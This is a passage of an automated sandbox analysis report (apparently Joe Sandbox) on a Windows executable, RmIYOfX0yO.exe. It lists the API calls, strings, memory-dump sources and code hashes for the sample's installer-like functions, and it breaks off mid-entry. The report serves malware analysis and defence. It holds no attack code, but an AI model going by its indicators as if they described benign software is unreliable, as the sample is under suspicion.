                                                                                                                    • ImageList_Destroy.COMCTL32(?), ref: 0040507E
                                                                                                                    • GlobalFree.KERNEL32(?), ref: 0040508E
                                                                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405107
                                                                                                                    • SendMessageW.USER32(?,00001102,?,?), ref: 004051B0
                                                                                                                    • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004051BF
                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 004051DF
                                                                                                                    • ShowWindow.USER32(?,00000000), ref: 0040522D
                                                                                                                    • GetDlgItem.USER32(?,000003FE), ref: 00405238
                                                                                                                    • ShowWindow.USER32(00000000), ref: 0040523F
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                    • String ID: $M$N
                                                                                                                    • API String ID: 1638840714-813528018
                                                                                                                    • Opcode ID: 8b7898f8f49f67d995be691c5ed78805e405c898658afbb61a3d1b4db651d7df
                                                                                                                    • Instruction ID: 46f3c2dfcfe7d78df06ebec09318e15d32e2b04993d9507e8b01d99ed80ca2ca
                                                                                                                    • Opcode Fuzzy Hash: 8b7898f8f49f67d995be691c5ed78805e405c898658afbb61a3d1b4db651d7df
                                                                                                                    • Instruction Fuzzy Hash: CA026EB0A00209AFDF209F65DD45AAE7BB5FB44314F10817AF610BA2E1C7799E52CF58
                                                                                                                    APIs
                                                                                                                    • GetDlgItem.USER32(?,000003FB), ref: 00404731
                                                                                                                    • SetWindowTextW.USER32(00000000,?), ref: 0040475B
                                                                                                                    • SHBrowseForFolderW.SHELL32(?), ref: 0040480C
                                                                                                                    • CoTaskMemFree.OLE32(00000000), ref: 00404817
                                                                                                                    • lstrcmpiW.KERNEL32(: Completed,00423748,00000000,?,?), ref: 00404849
                                                                                                                    • lstrcatW.KERNEL32(?,: Completed), ref: 00404855
                                                                                                                    • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404867
                                                                                                                      • Part of subcall function 004058AC: GetDlgItemTextW.USER32(?,?,00000400,0040489E), ref: 004058BF
                                                                                                                      • Part of subcall function 00406417: CharNextW.USER32(0040A230,*?|<>/":,00000000,"C:\Users\user\Desktop\RmIYOfX0yO.exe",756F3420,C:\Users\user\AppData\Local\Temp\,00000000,00403391,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035E2), ref: 0040647A
                                                                                                                      • Part of subcall function 00406417: CharNextW.USER32(0040A230,0040A230,0040A230,00000000), ref: 00406489
                                                                                                                      • Part of subcall function 00406417: CharNextW.USER32(0040A230,"C:\Users\user\Desktop\RmIYOfX0yO.exe",756F3420,C:\Users\user\AppData\Local\Temp\,00000000,00403391,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035E2), ref: 0040648E
                                                                                                                      • Part of subcall function 00406417: CharPrevW.USER32(0040A230,0040A230,756F3420,C:\Users\user\AppData\Local\Temp\,00000000,00403391,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035E2), ref: 004064A1
                                                                                                                    • GetDiskFreeSpaceW.KERNEL32(00421718,?,?,0000040F,?,00421718,00421718,?,00000001,00421718,?,?,000003FB,?), ref: 0040492A
                                                                                                                    • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404945
                                                                                                                      • Part of subcall function 00404A9E: lstrlenW.KERNEL32(00423748,00423748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B3F
                                                                                                                      • Part of subcall function 00404A9E: wsprintfW.USER32 ref: 00404B48
                                                                                                                      • Part of subcall function 00404A9E: SetDlgItemTextW.USER32(?,00423748), ref: 00404B5B
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                    • String ID: : Completed$A$C:\Users\user\AppData\Local\magmaet\clenched$H7B
                                                                                                                    • API String ID: 2624150263-1280379044
                                                                                                                    • Opcode ID: 29b82d879f89b335d801dd70145edd0b5915db95dd8f44cbea82b22297ec7ec8
                                                                                                                    • Instruction ID: 9c6f5067bad78934a321292c7affeb857c6c8b78ef178650078e6910c23b8850
                                                                                                                    • Opcode Fuzzy Hash: 29b82d879f89b335d801dd70145edd0b5915db95dd8f44cbea82b22297ec7ec8
                                                                                                                    • Instruction Fuzzy Hash: D8A183F1A00208ABDF11AFA5CD45AAFB7B8EF84314F10843BF611B62D1D77C99418B69
                                                                                                                    APIs
                                                                                                                    • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404482
                                                                                                                    • GetDlgItem.USER32(?,000003E8), ref: 00404496
                                                                                                                    • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004044B3
                                                                                                                    • GetSysColor.USER32(?), ref: 004044C4
                                                                                                                    • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004044D2
                                                                                                                    • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004044E0
                                                                                                                    • lstrlenW.KERNEL32(?), ref: 004044E5
                                                                                                                    • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004044F2
                                                                                                                    • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404507
                                                                                                                    • GetDlgItem.USER32(?,0000040A), ref: 00404560
                                                                                                                    • SendMessageW.USER32(00000000), ref: 00404567
                                                                                                                    • GetDlgItem.USER32(?,000003E8), ref: 00404592
                                                                                                                    • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004045D5
                                                                                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 004045E3
                                                                                                                    • SetCursor.USER32(00000000), ref: 004045E6
                                                                                                                    • ShellExecuteW.SHELL32(0000070B,open,00428200,00000000,00000000,00000001), ref: 004045FB
                                                                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 00404607
                                                                                                                    • SetCursor.USER32(00000000), ref: 0040460A
                                                                                                                    • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404639
                                                                                                                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 0040464B
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                                                    • String ID: : Completed$N$[C@$open
                                                                                                                    • API String ID: 3615053054-3308546834
                                                                                                                    • Opcode ID: f6016d8c67c9c4ff159701ca9c3d7a2502a484c18c0b7e2ffb0018dff941af02
                                                                                                                    • Instruction ID: 197425fdc48522821a3d1a28f7e64f0f4dcf149373df3ed1280bb5b235060fa2
                                                                                                                    • Opcode Fuzzy Hash: f6016d8c67c9c4ff159701ca9c3d7a2502a484c18c0b7e2ffb0018dff941af02
                                                                                                                    • Instruction Fuzzy Hash: D471A4B1A00209FFDB109F60DD85E6A7B69FB84344F00453AFA05B62E0D7799D51CFA9
                                                                                                                    APIs
                                                                                                                    • lstrcpyW.KERNEL32(00426DE8,NUL,?,00000000,?,Error writing temporary file. Make sure your temp folder is valid.,00406045,?,?), ref: 00405EC1
                                                                                                                    • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,Error writing temporary file. Make sure your temp folder is valid.,00406045,?,?), ref: 00405EE5
                                                                                                                    • GetShortPathNameW.KERNEL32(?,00426DE8,00000400), ref: 00405EEE
                                                                                                                      • Part of subcall function 00405CBD: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405F9E,00000000,[Rename],00000000,00000000,00000000), ref: 00405CCD
                                                                                                                      • Part of subcall function 00405CBD: lstrlenA.KERNEL32(00000000,?,00000000,00405F9E,00000000,[Rename],00000000,00000000,00000000), ref: 00405CFF
                                                                                                                    • GetShortPathNameW.KERNEL32(uB,004275E8,00000400), ref: 00405F0B
                                                                                                                    • wsprintfA.USER32 ref: 00405F29
                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,004275E8,C0000000,00000004,004275E8,?), ref: 00405F64
                                                                                                                    • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405F73
                                                                                                                    • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405FAB
                                                                                                                    • SetFilePointer.KERNEL32(0040A5A8,00000000,00000000,00000000,00000000,004269E8,00000000,-0000000A,0040A5A8,00000000,[Rename],00000000,00000000,00000000), ref: 00406001
                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00406012
                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00406019
                                                                                                                      • Part of subcall function 00405D58: GetFileAttributesW.KERNELBASE(00000003,00402E84,C:\Users\user\Desktop\RmIYOfX0yO.exe,80000000,00000003), ref: 00405D5C
                                                                                                                      • Part of subcall function 00405D58: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405D7E
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
                                                                                                                    • String ID: %ls=%ls$Error writing temporary file. Make sure your temp folder is valid.$NUL$[Rename]$mB$uB$uB
                                                                                                                    • API String ID: 222337774-3510403337
                                                                                                                    • Opcode ID: e7382f7b8c26af6e0710f3cc174a3ede04313a00f8ed0edbfd428e2cb97c63d7
                                                                                                                    • Instruction ID: e0a3a616164006467439f71a5ee21b177f06bf99c86c19659b49dd792d0ed9da
                                                                                                                    • Opcode Fuzzy Hash: e7382f7b8c26af6e0710f3cc174a3ede04313a00f8ed0edbfd428e2cb97c63d7
                                                                                                                    • Instruction Fuzzy Hash: 52312230241B157BD2206B618D09F6B3A5CEF85755F25003BFA42F62D2DA3CD9118ABD
                                                                                                                    APIs
                                                                                                                    • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                    • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                    • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                    • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                    • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                    • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                    • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                                    • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                    • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                    • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                    • DrawTextW.USER32(00000000,00429260,000000FF,00000010,00000820), ref: 00401156
                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                    • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                    • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                    • String ID: F
                                                                                                                    • API String ID: 941294808-1304234792
                                                                                                                    • Opcode ID: bf2da2548cab59f56b9c29784a74930a17cbf9c8a4836dedd9ba629d6cbcfebe
                                                                                                                    • Instruction ID: e4307af7b63af3c060521be2e9f36853b9854247f946bef182d968856dcca5c3
                                                                                                                    • Opcode Fuzzy Hash: bf2da2548cab59f56b9c29784a74930a17cbf9c8a4836dedd9ba629d6cbcfebe
                                                                                                                    • Instruction Fuzzy Hash: BB418B71800209AFCF058FA5DE459AFBBB9FF45310F00842EF991AA1A0C738DA55DFA4
                                                                                                                    APIs
                                                                                                                    • CharNextW.USER32(0040A230,*?|<>/":,00000000,"C:\Users\user\Desktop\RmIYOfX0yO.exe",756F3420,C:\Users\user\AppData\Local\Temp\,00000000,00403391,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035E2), ref: 0040647A
                                                                                                                    • CharNextW.USER32(0040A230,0040A230,0040A230,00000000), ref: 00406489
                                                                                                                    • CharNextW.USER32(0040A230,"C:\Users\user\Desktop\RmIYOfX0yO.exe",756F3420,C:\Users\user\AppData\Local\Temp\,00000000,00403391,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035E2), ref: 0040648E
                                                                                                                    • CharPrevW.USER32(0040A230,0040A230,756F3420,C:\Users\user\AppData\Local\Temp\,00000000,00403391,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035E2), ref: 004064A1
                                                                                                                    Strings
                                                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00406418
                                                                                                                    • "C:\Users\user\Desktop\RmIYOfX0yO.exe", xrefs: 0040645B
                                                                                                                    • *?|<>/":, xrefs: 00406469
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Char$Next$Prev
                                                                                                                    • String ID: "C:\Users\user\Desktop\RmIYOfX0yO.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                                    • API String ID: 589700163-1237631032
                                                                                                                    • Opcode ID: 3926a558a1d5fac86b1a7f5ee3cbb5d374d5244e5857cfc5627c81e884b8420d
                                                                                                                    • Instruction ID: 97757fea8cfc4e5e160e398f5921a23c68bb92f937fa9eb531f0d47839a376ba
                                                                                                                    • Opcode Fuzzy Hash: 3926a558a1d5fac86b1a7f5ee3cbb5d374d5244e5857cfc5627c81e884b8420d
                                                                                                                    • Instruction Fuzzy Hash: AE11941580171299DB307B189C80AB762F8EF94760F56843FED8AB32C0E77D5C9286BD
                                                                                                                    APIs
                                                                                                                    • GetWindowLongW.USER32(?,000000EB), ref: 004042CB
                                                                                                                    • GetSysColor.USER32(00000000), ref: 004042E7
                                                                                                                    • SetTextColor.GDI32(?,00000000), ref: 004042F3
                                                                                                                    • SetBkMode.GDI32(?,?), ref: 004042FF
                                                                                                                    • GetSysColor.USER32(?), ref: 00404312
                                                                                                                    • SetBkColor.GDI32(?,?), ref: 00404322
                                                                                                                    • DeleteObject.GDI32(?), ref: 0040433C
                                                                                                                    • CreateBrushIndirect.GDI32(?), ref: 00404346
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2320649405-0
                                                                                                                    • Opcode ID: 1be7c14e932793da5b7e12cfd745236bd09d54aa5f4605660dea7ebeed684375
                                                                                                                    • Instruction ID: c8c0c82dcd415c8ab494bd2ee85d05619b55063599498dccf98d91aa8dec70c5
                                                                                                                    • Opcode Fuzzy Hash: 1be7c14e932793da5b7e12cfd745236bd09d54aa5f4605660dea7ebeed684375
                                                                                                                    • Instruction Fuzzy Hash: 9C2154B15007449BC7219F68DE08B5B7BF8AF81714F08892DFD95E26A0D734E948CB54
                                                                                                                    APIs
                                                                                                                    • ReadFile.KERNEL32(?,?,?,?), ref: 0040264D
                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402688
                                                                                                                    • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004026AB
                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004026C1
                                                                                                                      • Part of subcall function 00405E39: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405E4F
                                                                                                                    • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040276D
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                                    • String ID: 9
                                                                                                                    • API String ID: 163830602-2366072709
                                                                                                                    • Opcode ID: 54eb05019f2e59d002bdcf8ef70b12416628f11d58b5efd06b79a11da1a785d5
                                                                                                                    • Instruction ID: 367b42b1b2af5c2ac759aacef6cd20ad90251cc9961805460d5ea366d256a81f
